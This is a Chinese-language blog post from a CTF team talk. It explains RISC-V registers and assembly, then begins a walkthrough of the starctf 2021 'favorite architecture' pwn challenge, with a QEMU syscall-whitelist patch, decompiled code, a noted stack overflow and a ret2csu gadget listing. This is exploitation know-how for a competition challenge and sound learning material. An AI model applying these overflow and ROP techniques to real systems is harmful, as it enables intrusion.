<!DOCTYPE html>
<html lang="en">
<head>
  <meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=2">
<meta name="theme-color" content="#222">
<meta name="generator" content="Hexo 5.3.0">
  <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon-next.png">
  <link rel="icon" type="image/png" sizes="32x32" href="/images/favicon-32x32-next.png">
  <link rel="icon" type="image/png" sizes="16x16" href="/images/favicon-16x16-next.png">
  <link rel="mask-icon" href="/images/logo.svg" color="#222">

<link rel="stylesheet" href="/css/main.css">

<link rel="stylesheet" href="https://fonts.loli.net/css?family=Noto Serif SC:300,300italic,400,400italic,700,700italic|Fira Code:300,300italic,400,400italic,700,700italic&display=swap&subset=latin,latin-ext">
<link rel="stylesheet" href="/lib/font-awesome/css/all.min.css">
  <link rel="stylesheet" href="//cdn.jsdelivr.net/gh/fancyapps/fancybox@3/dist/jquery.fancybox.min.css">


<script id="hexo-configurations">
    var NexT = window.NexT || {};
    var CONFIG = {"hostname":"garen-wang.cn","root":"/","scheme":"Gemini","version":"7.8.0","exturl":false,"sidebar":{"position":"left","display":"post","padding":18,"offset":12,"onmobile":false},"copycode":{"enable":true,"show_result":true,"style":null},"back2top":{"enable":true,"sidebar":false,"scrollpercent":true},"bookmark":{"enable":false,"color":"#222","save":"auto"},"fancybox":true,"mediumzoom":false,"lazyload":true,"pangu":false,"comments":{"style":"tabs","active":null,"storage":true,"lazyload":false,"nav":null},"algolia":{"hits":{"per_page":10},"labels":{"input_placeholder":"Search for Posts","hits_empty":"We didn't find any results for the search: ${query}","hits_stats":"${hits} results found in ${time} ms"}},"localsearch":{"enable":true,"trigger":"auto","top_n_per_article":1,"unescape":false,"preload":false},"motion":{"enable":true,"async":false,"transition":{"post_block":"fadeIn","post_header":"slideDownIn","post_body":"slideDownIn","coll_header":"slideLeftIn","sidebar":"slideUpIn"}},"path":"search.xml"};
  </script>

  <meta name="description" content="RISC-V的分享讲一讲RISC-V的内容吧，最近跟着一个跟RISC-V有关的开源项目玩了一下，对RISC-V有最基本的了解，就分享一下吧。 第一次做队内分享，讲的不对的话请大哥们指正。 RISC-V了解在qemu编译的时候写一写，等啊等 RISC-V作为PC端和嵌入式设备的新架构，不像x86那样有沉重的历史包袱，相比更加的精简与现代化。 去年华为专场的那场CTF就有挺多RISC-V方面的pwn题">
<meta property="og:type" content="article">
<meta property="og:title" content="First Presentation in Kap0k">
<meta property="og:url" content="http://garen-wang.cn/2021/03/27/First-Presentation-in-Kap0k/index.html">
<meta property="og:site_name" content="Garen Wang&#39;s Blog">
<meta property="og:description" content="RISC-V的分享讲一讲RISC-V的内容吧，最近跟着一个跟RISC-V有关的开源项目玩了一下，对RISC-V有最基本的了解，就分享一下吧。 第一次做队内分享，讲的不对的话请大哥们指正。 RISC-V了解在qemu编译的时候写一写，等啊等 RISC-V作为PC端和嵌入式设备的新架构，不像x86那样有沉重的历史包袱，相比更加的精简与现代化。 去年华为专场的那场CTF就有挺多RISC-V方面的pwn题">
<meta property="og:locale" content="en_US">
<meta property="og:image" content="http://qiniu.garen-wang.cn/static/images/First-Presentation-in-Kap0k/riscv.png">
<meta property="og:image" content="http://qiniu.garen-wang.cn/static/images/First-Presentation-in-Kap0k/prologue_and_epilogue.png">
<meta property="og:image" content="http://qiniu.garen-wang.cn/static/images/First-Presentation-in-Kap0k/you_are.png">
<meta property="og:image" content="http://qiniu.garen-wang.cn/static/images/First-Presentation-in-Kap0k/get_gp.png">
<meta property="og:image" content="http://qiniu.garen-wang.cn/static/images/First-Presentation-in-Kap0k/vmmap1.png">
<meta property="og:image" content="http://qiniu.garen-wang.cn/static/images/First-Presentation-in-Kap0k/cat_maps_failed.png">
<meta property="og:image" content="http://qiniu.garen-wang.cn/static/images/First-Presentation-in-Kap0k/cat_maps_successfully.png">
<meta property="article:published_time" content="2021-03-27T02:37:33.000Z">
<meta property="article:modified_time" content="2021-04-06T12:17:24.147Z">
<meta property="article:author" content="Garen Wang">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="http://qiniu.garen-wang.cn/static/images/First-Presentation-in-Kap0k/riscv.png">

<link rel="canonical" href="http://garen-wang.cn/2021/03/27/First-Presentation-in-Kap0k/">


<script id="page-configurations">
  // https://hexo.io/docs/variables.html
  CONFIG.page = {
    sidebar: "",
    isHome : false,
    isPost : true,
    lang   : 'en'
  };
</script>

  <title>First Presentation in Kap0k | Garen Wang's Blog</title>
  






  <noscript>
  <style>
  .use-motion .brand,
  .use-motion .menu-item,
  .sidebar-inner,
  .use-motion .post-block,
  .use-motion .pagination,
  .use-motion .comments,
  .use-motion .post-header,
  .use-motion .post-body,
  .use-motion .collection-header { opacity: initial; }

  .use-motion .site-title,
  .use-motion .site-subtitle {
    opacity: initial;
    top: initial;
  }

  .use-motion .logo-line-before i { left: initial; }
  .use-motion .logo-line-after i { right: initial; }
  </style>
</noscript>


</head>

<body itemscope itemtype="http://schema.org/WebPage">
  <div class="container use-motion">
    <div class="headband"></div>

    <header class="header" itemscope itemtype="http://schema.org/WPHeader">
      <div class="header-inner"><div class="site-brand-container">
  <div class="site-nav-toggle">
    <div class="toggle" aria-label="Toggle navigation bar">
      <span class="toggle-line toggle-line-first"></span>
      <span class="toggle-line toggle-line-middle"></span>
      <span class="toggle-line toggle-line-last"></span>
    </div>
  </div>

  <div class="site-meta">

    <a href="/" class="brand" rel="start">
      <span class="logo-line-before"><i></i></span>
      <h1 class="site-title">Garen Wang's Blog</h1>
      <span class="logo-line-after"><i></i></span>
    </a>
  </div>

  <div class="site-nav-right">
    <div class="toggle popup-trigger">
        <i class="fa fa-search fa-fw fa-lg"></i>
    </div>
  </div>
</div>




<nav class="site-nav">
  <ul id="menu" class="main-menu menu">
        <li class="menu-item menu-item-home">

    <a href="/" rel="section"><i class="fa fa-home fa-fw"></i>Home</a>

  </li>
        <li class="menu-item menu-item-archives">

    <a href="/archives/" rel="section"><i class="fa fa-archive fa-fw"></i>Archives</a>

  </li>
        <li class="menu-item menu-item-about">

    <a href="/about/" rel="section"><i class="fa fa-user fa-fw"></i>About</a>

  </li>
      <li class="menu-item menu-item-search">
        <a role="button" class="popup-trigger"><i class="fa fa-search fa-fw"></i>Search
        </a>
      </li>
  </ul>
</nav>



  <div class="search-pop-overlay">
    <div class="popup search-popup">
        <div class="search-header">
  <span class="search-icon">
    <i class="fa fa-search"></i>
  </span>
  <div class="search-input-container">
    <input autocomplete="off" autocapitalize="off"
           placeholder="Searching..." spellcheck="false"
           type="search" class="search-input">
  </div>
  <span class="popup-btn-close">
    <i class="fa fa-times-circle"></i>
  </span>
</div>
<div id="search-result">
  <div id="no-result">
    <i class="fa fa-spinner fa-pulse fa-5x fa-fw"></i>
  </div>
</div>

    </div>
  </div>


</div>
    </header>

    
  <div class="back-to-top">
    <i class="fa fa-arrow-up"></i>
    <span>0%</span>
  </div>


    <main class="main">
      <div class="main-inner">
        <div class="content-wrap">
          

          <div class="content post posts-expand">
            

    
  
  
  <article itemscope itemtype="http://schema.org/Article" class="post-block" lang="en">
    <link itemprop="mainEntityOfPage" href="http://garen-wang.cn/2021/03/27/First-Presentation-in-Kap0k/">

    <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
      <meta itemprop="image" content="/images/avatar.jpg">
      <meta itemprop="name" content="Garen Wang">
      <meta itemprop="description" content="">
    </span>

    <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="Garen Wang's Blog">
    </span>
      <header class="post-header">
        <h1 class="post-title" itemprop="name headline">
          First Presentation in Kap0k
        </h1>

        <div class="post-meta">
            <span class="post-meta-item">
              <span class="post-meta-item-icon">
                <i class="far fa-calendar"></i>
              </span>
              <span class="post-meta-item-text">Posted on</span>

              <time title="Created: 2021-03-27 10:37:33" itemprop="dateCreated datePublished" datetime="2021-03-27T10:37:33+08:00">2021-03-27</time>
            </span>
              <span class="post-meta-item">
                <span class="post-meta-item-icon">
                  <i class="far fa-calendar-check"></i>
                </span>
                <span class="post-meta-item-text">Edited on</span>
                <time title="Modified: 2021-04-06 20:17:24" itemprop="dateModified" datetime="2021-04-06T20:17:24+08:00">2021-04-06</time>
              </span>

          
            <span id="/2021/03/27/First-Presentation-in-Kap0k/" class="post-meta-item leancloud_visitors" data-flag-title="First Presentation in Kap0k" title="Views">
              <span class="post-meta-item-icon">
                <i class="fa fa-eye"></i>
              </span>
              <span class="post-meta-item-text">Views: </span>
              <span class="leancloud-visitors-count"></span>
            </span>
  
  <span class="post-meta-item">
    
      <span class="post-meta-item-icon">
        <i class="far fa-comment"></i>
      </span>
      <span class="post-meta-item-text">Valine: </span>
    
    <a title="valine" href="/2021/03/27/First-Presentation-in-Kap0k/#valine-comments" itemprop="discussionUrl">
      <span class="post-comments-count valine-comment-count" data-xid="/2021/03/27/First-Presentation-in-Kap0k/" itemprop="commentCount"></span>
    </a>
  </span>
  
  

        </div>
      </header>

    
    
    
    <div class="post-body" itemprop="articleBody">

      
        <h1 id="RISC-V的分享"><a href="#RISC-V的分享" class="headerlink" title="RISC-V的分享"></a>RISC-V的分享</h1><p>讲一讲RISC-V的内容吧，最近跟着一个跟RISC-V有关的开源项目玩了一下，对RISC-V有最基本的了解，就分享一下吧。</p>
<p>第一次做队内分享，讲的不对的话请大哥们指正。</p>
<h2 id="RISC-V了解"><a href="#RISC-V了解" class="headerlink" title="RISC-V了解"></a>RISC-V了解</h2><p><del>在qemu编译的时候写一写，等啊等</del></p>
<p>RISC-V作为PC端和嵌入式设备的新架构，不像x86那样有沉重的历史包袱，相比更加的精简与现代化。</p>
<p>去年华为专场的那场CTF就有挺多RISC-V方面的pwn题，了解了不亏。</p>
<p>RISC-V是大势所趋（逃</p>
<p><a target="_blank" rel="noopener" href="https://metalcode.eu/2019-12-06-rv32i.html">RISC-V Cheat Sheet</a></p>
<h3 id="RISC-V的寄存器"><a href="#RISC-V的寄存器" class="headerlink" title="RISC-V的寄存器"></a>RISC-V的寄存器</h3><img data-src="http://qiniu.garen-wang.cn/static/images/First-Presentation-in-Kap0k/riscv.png">
<p>RISC-V的寄存器有32个，从<code>x0</code>到<code>x31</code>。根据官方的调用规范，各寄存器有以下的性质：</p>
<ul>
<li><p><code>zero(x0)</code>是特殊的寄存器，任何时候值都为0。</p>
</li>
<li><p><code>ra(x1)</code>储存返回地址，在函数调用过程中会时常变化。caller saved</p>
</li>
<li><p><code>sp(x2)</code>相当于x86的<code>rsp/esp</code>，储存栈顶地址。callee saved</p>
</li>
<li><p><code>gp(x3)</code>和<code>tp(x4)</code>这两个寄存器很特殊，程序运行过程都不会变化，作用嘛，我想想……</p>
</li>
<li><p><code>a0(x10)-a7(x17)</code>是储存当前调用函数参数的寄存器。特别地：<code>a0</code>类似<code>rax</code>，储存返回值，<code>a7</code>传syscall的调用号。</p>
</li>
<li><p><code>pc</code>即program counter。</p>
</li>
<li><p><code>t1-t6</code>，是caller saved的temp寄存器。</p>
</li>
<li><p><code>s1-s11</code>，是callee saved的temp寄存器。</p>
</li>
</ul>
<h3 id="RISC-V汇编语句"><a href="#RISC-V汇编语句" class="headerlink" title="RISC-V汇编语句"></a>RISC-V汇编语句</h3><p><del>还在等toolchain的编译，忘开多进程了</del></p>
<p>在RISC-V中，想控制寄存器</p>
<p>由于汇编语句很多，并且存在很多伪指令（类似高级程序语言概念中的语法糖？），就只列举出重要的出来讲吧。</p>
<p><code>%hi(x)</code>和<code>%lo(x)</code>分别表示取<code>x</code>寄存器的高地址和低地址。</p>
<p><code>lb t0, 8(sp)</code>跟<code>sb t0, 8(sp)</code>是对称的，分别是读取内存储存到寄存器和读取寄存器恢复内存原始状态。</p>
<p>如何实现函数调用时的跳转？有两条汇编指令非常常用：</p>
<script type="math/tex; mode=display">{jal \qquad r_d,\quad  imm[20:1]}</script><script type="math/tex; mode=display">{jalr \quad r_d, \quad (imm[11:0])r_s}</script><p>作用是在$r_d$上保存下当前栈帧的<code>ra</code>，然后<code>pc</code>会跳转到与<code>pc</code>或者$r_s$的offset为$imm$的地址处。</p>
<p>而当函数要跳转回来时，相似地有<code>ret</code>的伪指令，这条指令会被认为是<code>jalr x0, 0(x1)</code>。</p>
<img data-src="http://qiniu.garen-wang.cn/static/images/First-Presentation-in-Kap0k/prologue_and_epilogue.png">
<p><a target="_blank" rel="noopener" href="https://stackoverflow.com/questions/64211181/whats-the-difference-between-caller-saved-and-callee-saved-in-risc-v">关于caller saved和callee saved的细节讨论</a></p>
<p>找到<a target="_blank" rel="noopener" href="https://web.eecs.utk.edu/~smarz1/courses/ece356/notes/assembly/">一篇不错的文章</a>，不懂的时候查一查就可以了。</p>
<h3 id="RISC-V实例"><a href="#RISC-V实例" class="headerlink" title="RISC-V实例"></a>RISC-V实例</h3><p>随便写了个类似helloworld的东西，拿到的<code>helloworld.s</code>，可以分析一下：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br></pre></td><td class="code"><pre><span class="line">.file	&quot;helloworld.c&quot;</span><br><span class="line">	.option nopic</span><br><span class="line">	.text</span><br><span class="line">	.section	.rodata</span><br><span class="line">	.align	3</span><br><span class="line">.LC0:</span><br><span class="line">	.string	&quot;Helloworld, %d&quot;</span><br><span class="line">	.text</span><br><span class="line">	.align	1</span><br><span class="line">	.globl	helloworld</span><br><span class="line">	.type	helloworld, @function</span><br><span class="line">helloworld:</span><br><span class="line">  # prologue</span><br><span class="line">	addi	sp,sp,-32</span><br><span class="line">	sd	ra,24(sp)</span><br><span class="line">	sd	s0,16(sp)</span><br><span class="line"></span><br><span class="line">  # main part</span><br><span class="line">	addi	s0,sp,32</span><br><span class="line">	mv	a5,a0 # source of second parameter</span><br><span class="line">	sw	a5,-20(s0)</span><br><span class="line">	lw	a5,-20(s0)</span><br><span class="line">	mv	a1,a5 # second parameter</span><br><span class="line">	lui	a5,%hi(.LC0)</span><br><span class="line">	addi	a0,a5,%lo(.LC0) # first parameter</span><br><span class="line">	call	printf</span><br><span class="line">	nop</span><br><span class="line"></span><br><span class="line">  # epilogue</span><br><span class="line">	ld	ra,24(sp)</span><br><span class="line">	ld	s0,16(sp)</span><br><span class="line">	addi	sp,sp,32</span><br><span class="line">	jr	ra</span><br><span class="line">	.size	helloworld, .-helloworld</span><br><span class="line">	.section	.rodata</span><br><span class="line">	.align	3</span><br><span class="line">.LC1:</span><br><span class="line">	.string	&quot;%d&quot;</span><br><span class="line">	.text</span><br><span class="line">	.align	1</span><br><span class="line">	.globl	main</span><br><span class="line">	.type	main, @function</span><br><span class="line">main:</span><br><span class="line">  # prologue of main</span><br><span class="line">	addi	sp,sp,-32</span><br><span class="line">	sd	ra,24(sp)</span><br><span class="line">	sd	s0,16(sp)</span><br><span class="line"></span><br><span class="line">  # main part</span><br><span class="line">	addi	s0,sp,32</span><br><span class="line">	addi	a5,s0,-20</span><br><span class="line">	mv	a1,a5 # second parameter: address of x</span><br><span class="line">	lui	a5,%hi(.LC1)</span><br><span class="line">	addi	a0,a5,%lo(.LC1) # first parameter: &quot;helloworld, %d&quot;</span><br><span class="line">	call	__isoc99_scanf</span><br><span class="line">	lw	a5,-20(s0)</span><br><span class="line">	mv	a0,a5 # first parameter: address of x</span><br><span class="line">	call	helloworld</span><br><span class="line">	li	a5,0 # clear a5</span><br><span class="line">	mv	a0,a5 # clear a0</span><br><span class="line"></span><br><span class="line">  # epilogue of main</span><br><span class="line">	ld	ra,24(sp)</span><br><span class="line">	ld	s0,16(sp)</span><br><span class="line">	addi	sp,sp,32</span><br><span class="line">	jr	ra</span><br><span class="line">	.size	main, .-main</span><br><span class="line">	.ident	&quot;GCC: (GNU) 10.2.0&quot;</span><br><span class="line">	.section	.note.GNU-stack,&quot;&quot;,@progbits</span><br><span class="line"></span><br></pre></td></tr></table></figure>
<h2 id="RISC-V环境配置"><a href="#RISC-V环境配置" class="headerlink" title="RISC-V环境配置"></a>RISC-V环境配置</h2><p>Ubuntu 18.04中可以配置RISC-V GNU Toolchain，内含RISCV架构下的<code>gcc</code>、<code>gdb</code>、<code>as</code>、<code>ld</code>、<code>readelf</code>等必不可少的工具。</p>
<p>同时当然也需要安装qemu，方便运行RV64的二进制文件。</p>
<p>有趣的是：以上的工具都需要编译安装，所需时间稍长。建议make的时候手动把进程拉满。</p>
<h2 id="例题：starctf-2021-pwn-amp-re-favorite-architecture"><a href="#例题：starctf-2021-pwn-amp-re-favorite-architecture" class="headerlink" title="例题：starctf 2021 pwn&amp;re favorite architecture"></a>例题：starctf 2021 pwn&amp;re favorite architecture</h2><h3 id="favorite-architecture-1"><a href="#favorite-architecture-1" class="headerlink" title="favorite architecture 1"></a>favorite architecture 1</h3><p>有个patch挺重要的，要先看一看：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br></pre></td><td class="code"><pre><span class="line">diff --git a&#x2F;linux-user&#x2F;syscall.c b&#x2F;linux-user&#x2F;syscall.c</span><br><span class="line">index 27adee9..2d75464 100644</span><br><span class="line">--- a&#x2F;linux-user&#x2F;syscall.c</span><br><span class="line">+++ b&#x2F;linux-user&#x2F;syscall.c</span><br><span class="line">@@ -13101,8 +13101,31 @@ abi_long do_syscall(void *cpu_env, int num, abi_long arg1,</span><br><span class="line">         print_syscall(cpu_env, num, arg1, arg2, arg3, arg4, arg5, arg6);</span><br><span class="line">     &#125;</span><br><span class="line"> </span><br><span class="line">-    ret &#x3D; do_syscall1(cpu_env, num, arg1, arg2, arg3, arg4,</span><br><span class="line">-                      arg5, arg6, arg7, arg8);</span><br><span class="line">+    switch (num) &#123;</span><br><span class="line">+        &#x2F;&#x2F; syscall whitelist</span><br><span class="line">+        case TARGET_NR_brk:</span><br><span class="line">+        case TARGET_NR_uname:</span><br><span class="line">+        case TARGET_NR_readlinkat:</span><br><span class="line">+        case TARGET_NR_faccessat:</span><br><span class="line">+        case TARGET_NR_openat2:</span><br><span class="line">+        case TARGET_NR_openat:</span><br><span class="line">+        case TARGET_NR_read:</span><br><span class="line">+        case TARGET_NR_readv:</span><br><span class="line">+        case TARGET_NR_write:</span><br><span class="line">+        case TARGET_NR_writev:</span><br><span class="line">+        case TARGET_NR_mmap:</span><br><span class="line">+        case TARGET_NR_munmap:</span><br><span class="line">+        case TARGET_NR_exit:</span><br><span class="line">+        case TARGET_NR_exit_group:</span><br><span class="line">+        case TARGET_NR_mprotect:</span><br><span class="line">+            ret &#x3D; do_syscall1(cpu_env, num, arg1, arg2, arg3, arg4,</span><br><span class="line">+                    arg5, arg6, arg7, arg8);</span><br><span class="line">+            break;</span><br><span class="line">+        default:</span><br><span class="line">+            printf(&quot;[!] %d bad system call\n&quot;, num);</span><br><span class="line">+            ret &#x3D; -1;</span><br><span class="line">+            break;</span><br><span class="line">+    &#125;</span><br><span class="line"> </span><br><span class="line">     if (unlikely(qemu_loglevel_mask(LOG_STRACE))) &#123;</span><br><span class="line">         print_syscall_ret(cpu_env, num, ret, arg1, arg2,</span><br></pre></td></tr></table></figure>
<p>意思就是过滤了RISC-V的syscall指令，只剩下这几个让你用，没有<code>execve</code>。</p>
<p>checksec一下<code>main</code>文件，保护几乎都关了，ASLR也没有。是静态链接的二进制文件。</p>
<p>反编译打开，搜一下跟”flag”有关的字符串，定位main函数。</p>
<img data-src="http://qiniu.garen-wang.cn/static/images/First-Presentation-in-Kap0k/you_are.png">
<p>结果发现符号表没了，不能正常地得到编译结果，只能看到汇编。</p>
<p>在博客上找到一种解决方法：</p>
<blockquote>
<p>反编译出现 unknown error 时得手动改 gp 为 0x6f178（ctrl-A → ctrl-R → 找到gp寄存器并修改）(感谢@X1do0发现的解决方案)</p>
</blockquote>
<p>在哪里找得到？在0x101ec可以看见：</p>
<img data-src="http://qiniu.garen-wang.cn/static/images/First-Presentation-in-Kap0k/get_gp.png">
<p>得到的主函数反编译结果：</p>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br></pre></td><td class="code"><pre><span class="line"><span class="function">undefined8 <span class="title">UndefinedFunction_00010400</span><span class="params">(<span class="keyword">void</span>)</span> </span>&#123;</span><br><span class="line">  ulonglong uVar1;</span><br><span class="line">  longlong lVar2;</span><br><span class="line">  undefined auStack488 [<span class="number">192</span>];</span><br><span class="line">  undefined auStack296 [<span class="number">256</span>];</span><br><span class="line">  ulonglong uStack40;</span><br><span class="line">  longlong lStack32;</span><br><span class="line">  <span class="keyword">int</span> iStack20;<span class="comment">// cnt</span></span><br><span class="line">  </span><br><span class="line">  FUN_00017d74(PTR_DAT_0006ea28,<span class="number">0</span>);<span class="comment">// setvbuf</span></span><br><span class="line">  FUN_00017d74(PTR_DAT_0006ea20,<span class="number">0</span>);<span class="comment">// setvbuf</span></span><br><span class="line">  FUN_00017d74(PTR_DAT_0006ea18,<span class="number">0</span>);<span class="comment">// setvbuf</span></span><br><span class="line">  FUN_0001605a(<span class="string">&quot;Input the flag: &quot;</span>);<span class="comment">// output</span></span><br><span class="line">  FUN_00016a5a(auStack296);<span class="comment">// read your input</span></span><br><span class="line">  uVar1 = FUN_000204e4(auStack296);<span class="comment">// get string</span></span><br><span class="line">  <span class="keyword">if</span> (uVar1 == ((longlong)(iRam000000000006e9dc + iRam000000000006e9d8) &amp; <span class="number">0xffffffff</span>U)) &#123;</span><br><span class="line">    lStack32 = FUN_00020386(auStack296 + ((longlong)iRam000000000006e9d8 &amp; <span class="number">0xffffffff</span>));</span><br><span class="line">    FUN_0001118a(auStack488,<span class="string">&quot;tzgkwukglbslrmfjsrwimtwyyrkejqzo&quot;</span>,<span class="string">&quot;oaeqjfhclrqk&quot;</span>,<span class="number">0x80</span>);</span><br><span class="line">    FUN_000111ea(auStack488,auStack296,iRam000000000006e9d8);</span><br><span class="line">    lVar2 = FUN_00020e2a(auStack296,&amp;DAT_0006d000,iRam000000000006e9d8);</span><br><span class="line">    <span class="keyword">if</span> (lVar2 == <span class="number">0</span>) &#123;</span><br><span class="line">      uStack40 = FUN_000204e4(lStack32);</span><br><span class="line">      iStack20 = <span class="number">0</span>;</span><br><span class="line">      <span class="keyword">while</span>( <span class="literal">true</span> ) &#123;</span><br><span class="line">        <span class="keyword">if</span> (uStack40 &gt;&gt; <span class="number">3</span> &lt;= (ulonglong)(longlong)iStack20) &#123;</span><br><span class="line">          FUN_00016bc8(<span class="string">&quot;You are right :D&quot;</span>);<span class="comment">// output</span></span><br><span class="line">          gp = (undefined *)<span class="number">0x6f178</span>;</span><br><span class="line">          <span class="keyword">return</span> <span class="number">0</span>;</span><br><span class="line">        &#125;</span><br><span class="line">        FUN_000102ae(iStack20 * <span class="number">8</span> + lStack32,&amp;DAT_0006d060);</span><br><span class="line">        lVar2 = FUN_00020e2a(iStack20 * <span class="number">8</span> + lStack32,(longlong)(iStack20 * <span class="number">8</span>) + <span class="number">0x6d030</span>,<span class="number">8</span>);</span><br><span class="line">        <span class="keyword">if</span> (lVar2 != <span class="number">0</span>) <span class="keyword">break</span>;</span><br><span class="line">        iStack20 = iStack20 + <span class="number">1</span>;</span><br><span class="line">      &#125;</span><br><span class="line">    &#125;</span><br><span class="line">  &#125;</span><br><span class="line">  FUN_00016bc8(<span class="string">&quot;You are wrong ._.&quot;</span>);<span class="comment">// output</span></span><br><span class="line">  gp = (undefined *)<span class="number">0x6f178</span>;</span><br><span class="line">  <span class="keyword">return</span> <span class="number">1</span>;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>
<p>其实读入部分就是一个栈溢出，就有很多解法，既可以写shellcode，也可以写ROP。</p>
<p>RISC-V下的syscall跟x86的还是不一样，具体<a target="_blank" rel="noopener" href="https://github.com/westerndigitalcorporation/RISC-V-Linux/blob/master/riscv-pk/pk/syscall.h">看表</a>。</p>
<p>如果用ROP打的话，ret2csu在rv64也是很好用的。</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br></pre></td><td class="code"><pre><span class="line">00011772 93 07 84 b8     addi       a5,s0,-0x478</span><br><span class="line">00011776 13 09 09 b9     addi       s2,s2,-0x470</span><br><span class="line">0001177a 33 09 f9 40     sub        s2,s2,a5</span><br><span class="line">0001177e 13 59 39 40     srai       s2,s2,0x3</span><br><span class="line">00011782 63 0e 09 00     beq        s2,zero,LAB_0001179e</span><br><span class="line">00011786 13 04 84 b8     addi       s0,s0,-0x478</span><br><span class="line">0001178a 81 44           c.li       s1,0x0</span><br><span class="line">                     LAB_0001178c                                    XREF[1]:     0001179a(j)  </span><br><span class="line">0001178c 1c 60           c.ld       a5&#x3D;&gt;-&gt;FUN_00010284,0x0(s0&#x3D;&gt;-&gt;FUN_00010250)       &#x3D; 00010284</span><br><span class="line">                                                                                     &#x3D; 00010250</span><br><span class="line">0001178e 56 86           c.mv       a2,s5</span><br><span class="line">00011790 d2 85           c.mv       a1,s4</span><br><span class="line">00011792 4e 85           c.mv       a0,s3</span><br><span class="line">00011794 85 04           c.addi     s1,0x1</span><br><span class="line">00011796 82 97           c.jalr     a5&#x3D;&gt;FUN_00010284                                 undefined FUN_00010250()</span><br><span class="line">                                                                                     undefined FUN_00010284()</span><br><span class="line">00011798 21 04           c.addi     s0,0x8</span><br><span class="line">0001179a e3 19 99 fe     bne        s2,s1,LAB_0001178c</span><br><span class="line">                     LAB_0001179e                                    XREF[1]:     00011782(j)  </span><br><span class="line">0001179e e2 70           c.ldsp     ra,0x38(sp)</span><br><span class="line">000117a0 42 74           c.ldsp     s0,0x30(sp)</span><br><span class="line">000117a2 a2 74           c.ldsp     s1,0x28(sp)</span><br><span class="line">000117a4 02 79           c.ldsp     s2,0x20(sp)</span><br><span class="line">000117a6 e2 69           c.ldsp     s3,0x18(sp)</span><br><span class="line">000117a8 42 6a           c.ldsp     s4,0x10(sp)</span><br><span class="line">000117aa a2 6a           c.ldsp     s5,0x8(sp)</span><br><span class="line">000117ac 21 61           c.addi16sp sp,0x40</span><br><span class="line">000117ae 82 80           ret</span><br></pre></td></tr></table></figure>
